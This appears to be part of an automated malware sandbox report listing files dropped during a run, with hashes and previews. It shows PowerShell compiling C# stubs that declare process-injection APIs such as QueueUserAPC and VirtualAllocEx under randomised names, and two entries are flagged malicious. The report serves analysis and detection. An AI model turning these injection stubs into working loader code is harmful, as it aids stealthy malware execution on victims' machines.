                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):182
                                                                                Entropy (8bit):4.685293041881485
                                                                                Encrypted:false
                                                                                SSDEEP:3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
                                                                                MD5:C4F67A4EFC37372559CD375AA74454A3
                                                                                SHA1:2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
                                                                                SHA-256:C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
                                                                                SHA-512:1EE4D2C1ED8044128DCDCDB97DC8680886AD0EC06C856F2449B67A6B0B9D7DE0A5EA2BBA54EB405AB129DD0247E605B68DC11CEB6A074E6CF088A73948AF2481
                                                                                Malicious:false
                                                                                IE Cache URL:https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                                                                                Preview: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\medianet[1].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:HTML document, ASCII text, with very long lines
                                                                                Category:downloaded
                                                                                Size (bytes):384616
                                                                                Entropy (8bit):5.484073934922233
                                                                                Encrypted:false
                                                                                SSDEEP:6144:4mJ9Tw5qIZvbzH0m9ZnGQVvgz5RCu1b5xKSv7IW:VIZvvPnGQVvgnxV7K07IW
                                                                                MD5:EE243872DE41542B407AD43FB9DB8E40
                                                                                SHA1:D28FC0621E17057421B67B95B89E5FE54C6BFFBE
                                                                                SHA-256:9EBCED9C193CDDAF3BA63891D21D04A815783FFBD1F40232CAF4B3CD691C597D
                                                                                SHA-512:8E17F3BB3ADB985540E565C0C5591B0459595C747F8950332EC2FC94DFB77FB597038A466358C1CD9304990193236031EFC68610B1C3022AF3B0AE85DE1FDF76
                                                                                Malicious:false
                                                                                IE Cache URL:https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                                                                                Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\medianet[2].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:HTML document, ASCII text, with very long lines
                                                                                Category:downloaded
                                                                                Size (bytes):384616
                                                                                Entropy (8bit):5.484076610902128
                                                                                Encrypted:false
                                                                                SSDEEP:6144:4mJ9Tw5qIZvbzH0m9ZnGQVvgz5RCu1bCxKSv7IW:VIZvvPnGQVvgnxVOK07IW
                                                                                MD5:9A7455480608F69BAF9C4B25705AF607
                                                                                SHA1:FF3880EBAEB46B731655A04802CED8273910FB35
                                                                                SHA-256:40183F2A611FEEDC597D42CE1992CB9FD4B9BE762B35105F98EEC38939DF01B3
                                                                                SHA-512:7576E386EA17FE8621671A3DF922E715FCCC48525AF72DCFCF0BE1F1C9B5FA5DCAA038AF859783EAB27E24EE0B182BB17593B4C6A899491E247849CDA5F27070
                                                                                Malicious:false
                                                                                IE Cache URL:https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                                                                                Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\otBannerSdk[1].js
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):353215
                                                                                Entropy (8bit):5.298793785430684
                                                                                Encrypted:false
                                                                                SSDEEP:3072:BpqAkqNs7z+NwHr5GR74A+x8sP/An4bb4yxL/Z8NdWRHnoVVMyDkpZ:B0C8zZ5G+x8sP/Ani4yxDAdWRHoVVAZ
                                                                                MD5:9982BA07340077CE7240B75C6C6FCBB4
                                                                                SHA1:D776E39E13F151C5ED2F7E5761EDE13D9CC72D27
                                                                                SHA-256:87C99BCF98F3DA7D1429DAC8184E3212634B65706CE7740CE940D1553B57DAAA
                                                                                SHA-512:3EEB895128D38BBBE4FDE8CD71B4FC563C38FFA2F1BCBB3A323D280B4812B0B111DEC1D745BE8EE8F792F7977978FFF03BB00C795C3F5CAFE6E62B3EDF2E88FD
                                                                                Malicious:false
                                                                                IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk.js
                                                                                Preview: /** .. * onetrust-banner-sdk.. * v6.7.0.. * by OneTrust LLC.. * Copyright 2020 .. */..!function () { "use strict"; var o = function (e, t) { return (o = Object.setPrototypeOf || { __proto__: [] } instanceof Array && function (e, t) { e.__proto__ = t } || function (e, t) { for (var o in t) t.hasOwnProperty(o) && (e[o] = t[o]) })(e, t) }; var r = function () { return (r = Object.assign || function (e) { for (var t, o = 1, n = arguments.length; o < n; o++)for (var r in t = arguments[o]) Object.prototype.hasOwnProperty.call(t, r) && (e[r] = t[r]); return e }).apply(this, arguments) }; function l(s, i, a, l) { return new (a = a || Promise)(function (e, t) { function o(e) { try { r(l.next(e)) } catch (e) { t(e) } } function n(e) { try { r(l.throw(e)) } catch (e) { t(e) } } function r(t) { t.done ? e(t.value) : new a(function (e) { e(t.value) }).then(o, n) } r((l = l.apply(s, i || [])).next()) }) } function k(o, n) { var r, s, i, e, a = { label: 0, sent: function () { if (1 & i[0]) throw i[1]
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):11606
                                                                                Entropy (8bit):4.8910535897909355
                                                                                Encrypted:false
                                                                                SSDEEP:192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
                                                                                MD5:7A57D8959BFD0B97B364F902ACD60F90
                                                                                SHA1:7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
                                                                                SHA-256:47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
                                                                                SHA-512:83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
                                                                                Malicious:false
                                                                                Preview: PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1192
                                                                                Entropy (8bit):5.325275554903011
                                                                                Encrypted:false
                                                                                SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKaBPnKdi5:qEPerB4nqRL/HvFe9t4CvpBfui5
                                                                                MD5:C85C42A32E22DE29393FCCCCF3BBA96E
                                                                                SHA1:EAF3755C63061C96400536041D4F4EB8BC66E99E
                                                                                SHA-256:9022F6D5F92065B07E1C63F551EC66E19B13E067C179C65EF520BA10DA8AE42C
                                                                                SHA-512:7708F8C2F4A6B362E35CED939F87B1232F19E16F191A67E29A00E6BB3CDCE89299E9A8D7129C3DFBF39C2B0EBAF160A8455D520D5BFB9619E4CDA5CC9BDCF550
                                                                                Malicious:false
                                                                                Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                C:\Users\user\AppData\Local\Temp\RES3AD7.tmp
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):2184
                                                                                Entropy (8bit):2.7127201551206244
                                                                                Encrypted:false
                                                                                SSDEEP:24:p+fAlyVYDfHQhhKdNNI+ycuZhNjakSVPNnq9qp5e9Ep:cAs8wvKd31ulja3Pq9e
                                                                                MD5:DB55F6B8F7AF9E318FE69ED67E1AE930
                                                                                SHA1:C7CDD348AB1E16C6263949CEBA2944EA832DE7FF
                                                                                SHA-256:5934FDAAE975309A02AD81A2289E0D88DDC32DBE8BBEB081D9C58F13BC1F9F3F
                                                                                SHA-512:460C2AFC4A84396959AA86D45BED5C4701173F6C5391083BC74EA43A8FC728DE761BD86BE4777E3C8E7EDFB7BBB0DA0B93F3D1FA4CC658ED0D9CD015AF2760C2
                                                                                Malicious:false
                                                                                Preview: ........T....c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP...............#...kV................4.......C:\Users\user\AppData\Local\Temp\RES3AD7.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                C:\Users\user\AppData\Local\Temp\RES4CF7.tmp
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):2184
                                                                                Entropy (8bit):2.699790458157591
                                                                                Encrypted:false
                                                                                SSDEEP:24:bZfTXaDfHPhKdNNI+ycuZhNxakSPPNnq9qp1ke9Ep:bBDgJKd31ulxa3Nq9IK
                                                                                MD5:195136ECBE387CDCD604D66CD99FA32B
                                                                                SHA1:EA045FF0A8FF0512A9BDAC369031011B768232E0
                                                                                SHA-256:DA5530A9E8423DC63F4BF7DD0195D5D8C6AC76E62EB403E1D0295B81AD294216
                                                                                SHA-512:634DD24540F8C60D75F350F4C880216F8918C2B4F36829C65EE29EE8754FB3A38DEF21EC7A230F430D999D3A1D403D71B97B73A5D713F8A3714384EC6704A780
                                                                                Malicious:false
                                                                                Preview: ........S....c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP................,:.f ...3..Mb............4.......C:\Users\user\AppData\Local\Temp\RES4CF7.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1g3p5jkb.b5s.psm1
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview: 1
                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zr1lulwh.tdw.ps1
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview: 1
                                                                                C:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                File Type:MSVC .res
                                                                                Category:dropped
                                                                                Size (bytes):652
                                                                                Entropy (8bit):3.080375887352444
                                                                                Encrypted:false
                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRak7YnqqVPN5Dlq5J:+RI+ycuZhNjakSVPNnqX
                                                                                MD5:23121F156B5618DBCCBEC98A14E79BA8
                                                                                SHA1:6EAC5FC0D4D3321AABB87C4C765ED4909753904D
                                                                                SHA-256:47A1CEDFEFE72CA448AB56B3C316CF2B36BCC48144A0B44E59E7C59F34AB398A
                                                                                SHA-512:71A42236CE7A6589A67968EE7A20E95BAE2DB493F5323A40D15764907DC63CE09DCD490E5731564FAFF68CFFDE552A674CFA6150061B09B1A262C2F1B9B1A9CB
                                                                                Malicious:false
                                                                                Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.a.y.i.4.a.b.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...g.a.y.i.4.a.b.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.0.cs
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:UTF-8 Unicode (with BOM) text
                                                                                Category:dropped
                                                                                Size (bytes):409
                                                                                Entropy (8bit):5.052013007754227
                                                                                Encrypted:false
                                                                                SSDEEP:6:V/DsYLDS81zuJv/VMRSR7a13o4OSSRa+rVSSRnA/fAqFQy:V/DTLDfu3F4O59rV5nA/TFQy
                                                                                MD5:9FD7479AC9BD39EAF111AEDEC976D3AA
                                                                                SHA1:43E99395C9BC72CE1A0280EAB7785DF4A28A7315
                                                                                SHA-256:3ADE2B51AA3CC413287C4D1C4C85E45C43143CC7871AE72387D161B564D998CF
                                                                                SHA-512:78F2086E6D4D5F72354F9FF5F8A8D58EF4F162B1F3BFCFD6D87A817980A68E61AF08CBA8B00D2ED7B33E8A75AD15416AF0B6CB9B1C4F9400FE950101AC297467
                                                                                Malicious:false
                                                                                Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class unnvjs. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr ebfsgcy,IntPtr wwxwfnuwpfa,IntPtr ixqmfwmf);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ikqvo,uint uoskv,IntPtr edyfcvneu);.. }..}.
                                                                                C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):369
                                                                                Entropy (8bit):5.2038129268622955
                                                                                Encrypted:false
                                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fIhOLkzxs7+AEszIwkn23fIhOLXxn:p37Lvkmb6KRfAhOLkWZEifAhOLh
                                                                                MD5:05DA2BFCC9349B302A9CC7F516BE81D6
                                                                                SHA1:190F783218A076D5F9738407F55936CC70A84F1E
                                                                                SHA-256:13F94D21CB62133A655298B9B86B6321275B87B26B85359B03CF85C4C1BE6EAB
                                                                                SHA-512:A1DA627C0211A9C52549AA97AB41F767355399BE3894E701EF963A9E231674916356D028151182392B458D7EE28E6FFCB107872E785C030EED4E1ED2FBFF3D30
                                                                                Malicious:true
                                                                                Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.0.cs"
                                                                                C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.dll
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):3584
                                                                                Entropy (8bit):2.6302636060426288
                                                                                Encrypted:false
                                                                                SSDEEP:24:etGSr8mmDg85z79Eo1egHop64NEtkZf6m/at3hkh+I+ycuZhNjakSVPNnq:6Rmb5NR/gbJF/aLK+1ulja3Pq
                                                                                MD5:EB8F2ABC76A1DDA6DBE4632830246B64
                                                                                SHA1:32697939CD9B578C7F463D4976E90B88E5AA3DAE
                                                                                SHA-256:CA29669E1473A60361534DAA292EBBB837A975DA5BB4F7922FEAA5AAC5A79EA0
                                                                                SHA-512:889438486CE35E35E1E93DAB0CF58A3CAF83A3E5C06591B287A3A4E8841E4C2CE7C680142ADACBF989EE1A5236B780EEFCB67DC68FE795CE58B0F40297DD702A
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.out
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                Category:modified
                                                                                Size (bytes):412
                                                                                Entropy (8bit):4.871364761010112
                                                                                Encrypted:false
                                                                                SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                Malicious:false
                                                                                Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                C:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                File Type:MSVC .res
                                                                                Category:dropped
                                                                                Size (bytes):652
                                                                                Entropy (8bit):3.083418702360773
                                                                                Encrypted:false
                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryDak7YnqqPPN5Dlq5J:+RI+ycuZhNxakSPPNnqX
                                                                                MD5:2C3AE4B96620D01A1F33988D4D62BDC4
                                                                                SHA1:6216CFF8DDB2C0F3FFDF65C9C98E8F8D2ED1E2E6
                                                                                SHA-256:01C0D783ED0B2A8038C58A97F7E15E4202F50AC65E25BB29B86FEC466A06DE10
                                                                                SHA-512:ED9A45C4AA7DD146B8B4C868B4503372A3B65D943746C5F916CBEFEE73415D9B41ADFDCA8A28D7B975E7CC1325F0A213BA0155D9D7A5767D5C85CC60F19EE0CA
                                                                                Malicious:false
                                                                                Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.i.0.g.y.o.x.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.i.0.g.y.o.x.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.0.cs
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:UTF-8 Unicode (with BOM) text
                                                                                Category:dropped
                                                                                Size (bytes):414
                                                                                Entropy (8bit):5.0112862311676984
                                                                                Encrypted:false
                                                                                SSDEEP:6:V/DsYLDS81zuJd0PMRSRa+eNMjSSRrSBHJkSRHq1/ieA7iolWwy:V/DTLDfu309eg5rSjvu6/7iolWwy
                                                                                MD5:9E60DAE8669F4427D81524FC662E0E11
                                                                                SHA1:63CC313ED28BC014023379CBDCFAA5DE102AE47C
                                                                                SHA-256:153DE2EE6E519F011708A8F64105253F479B82D64D695D2343FAE9213D677133
                                                                                SHA-512:963CACF3B2BC7D60E0EC5D2A52C8FD6AB4E81D64B0D8C5D4409A5170B9D164DCFA1F2E7AEDAB732D198BAADF74C2DEFF82C8370BA5E2B13E8170BF94213B50CF
                                                                                Malicious:true
                                                                                Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class vsswd. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint mvgrgqg,uint scbstveeig);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr lpqyi,IntPtr tfl,uint yjmgjhtw,uint gvbkpogio,uint ctoxlkyqq);.. }..}.
                                                                                C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):369
                                                                                Entropy (8bit):5.2404904218730755
                                                                                Encrypted:false
                                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fmzxs7+AEszIwkn23fBGA:p37Lvkmb6KRfeWZEifT
                                                                                MD5:CD09E9D4D72BCDDB6267560EE2F0D944
                                                                                SHA1:1A65484932E5AD734F2F7E291A533BC21ACC9451
                                                                                SHA-256:2ECB2DAF7D97E166AF6E64E9C283B67C23D0241A60278048A13155906D6F6104
                                                                                SHA-512:AF05A0226CF9CB3CA2BA3EBBFC7EDEC834EF63F9D8C4D7D14ADD473253A189A17EDDFADAA0E6ECA006D2AC261910052888BFAD76EFDB6A6EFA46C64FA198E14F
                                                                                Malicious:false
                                                                                Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.0.cs"
                                                                                C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.dll
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):3584
                                                                                Entropy (8bit):2.625980258515641
                                                                                Encrypted:false
                                                                                SSDEEP:24:etGSvM+WEei8MTl2CLKo90k0JdWtqotkZfLrNFw7I+ycuZhNxakSPPNnq:6N7qMTlRKwIWtuJLrNs1ulxa3Nq
                                                                                MD5:11505803207BB19004B0C15AF776C05C
                                                                                SHA1:1F7358DDA484AF375759E7B7510B59FDECA0A671
                                                                                SHA-256:6263E60F9487AB3A625D9DB8F9AF121182003E24C98A6A2CB3D5DBDD2FC35990
                                                                                SHA-512:0DA180447B3629CD3D0321FE9D2E81F064DE4A01B64E039B1B222E33EC6B5323529823997968DEB58016A33D1F2A2BFF46E8780277E996034B5ADCAAD6D5529A
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.out
                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                Category:modified
                                                                                Size (bytes):412
                                                                                Entropy (8bit):4.871364761010112
                                                                                Encrypted:false
                                                                                SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                Malicious:false
